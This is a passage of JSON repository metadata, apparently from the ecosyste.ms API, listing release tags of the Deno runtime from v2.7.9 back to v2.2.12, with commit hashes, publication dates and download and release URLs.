10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_